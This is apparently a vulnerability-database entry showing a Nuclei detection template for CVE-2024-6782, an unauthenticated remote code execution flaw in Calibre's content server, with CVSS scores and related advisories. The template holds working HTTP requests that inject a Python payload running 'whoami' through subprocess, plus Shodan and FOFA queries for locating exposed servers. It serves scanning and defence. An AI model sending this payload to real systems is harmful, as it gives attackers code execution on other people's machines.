Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-6782HistoryAug 01, 2024 - 5:44 a.m.
Calibre <= 7.14.0 Remote Code Execution
2024-08-0105:44:57
ProjectDiscovery
github.com
57
cve
cve2024
calibre
remote code execution
unauthenticated
content server
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
7.8
Confidence
Low
EPSS
0.002
Percentile
59.7%
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
id: CVE-2024-6782
info:
name: Calibre <= 7.14.0 Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
reference:
- https://starlabs.sg/advisories/24/24-6781/
metadata:
verified: true
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-requeset: 1
tags: cve,cve2024,calibre,rce
http:
- raw:
- |
GET /interface-data/books-init HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}
extractors:
- type: json
name: book_ids
internal: true
json:
- '.search_result.book_ids[0]'
- raw:
- |
POST /cdb/cmd/list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[
["template"],
"",
"",
"",
{{book_ids}},
"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n except Exception:\n return subprocess.check_output(['sh', '-c', 'whoami'])\n"
]
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "b'([^']+)"
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950References
Related
ubuntucve
ubuntucve
CVE-2024-6782
2024-08-06 00:00:00
nvd
nvd
CVE-2024-6782
2024-08-06 04:16:46
cve
cve
CVE-2024-6782
2024-08-06 04:16:46
packetstorm
packetstorm
Calibre 7.15.0 Python Code Injection
2024-08-08 00:00:00
debiancve
debiancve
CVE-2024-6782
2024-08-06 04:16:46
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up 08/09/2024
2024-08-09 18:21:16
vulnrichment
vulnrichment
CVE-2024-6782 Calibre Remote Code Execution
2024-08-06 03:39:20
githubexploit
githubexploit
Exploit for CVE-2024-6782
2024-08-06 15:31:48
Exploit for CVE-2024-6782
2024-08-09 06:25:03
Exploit for CVE-2024-6782
2024-09-15 18:45:44
cvelist
cvelist
CVE-2024-6782 Calibre Remote Code Execution
2024-08-06 03:39:20
zdt
zdt
Calibre 7.15.0 Python Code Injection Exploit
2024-08-08 00:00:00
metasploit
metasploit
Calibre Python Code Injection (CVE-2024-6782)
2024-08-02 05:03:15
osv
osv
CVE-2024-6782
2024-08-06 04:16:46
nessus
nessus
Fedora 40 : calibre (2024-a455bea9ca)
2024-08-27 00:00:00
fedora
fedora
[SECURITY] Fedora 40 Update: calibre-7.17.0-3.fc40
2024-08-27 17:09:06
openvas
openvas
Fedora: Security Advisory (FEDORA-2024-a455bea9ca)
2024-09-10 00:00:00
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
7.8
Confidence
Low
EPSS
0.002
Percentile
59.7%
Related for NUCLEI:CVE-2024-6782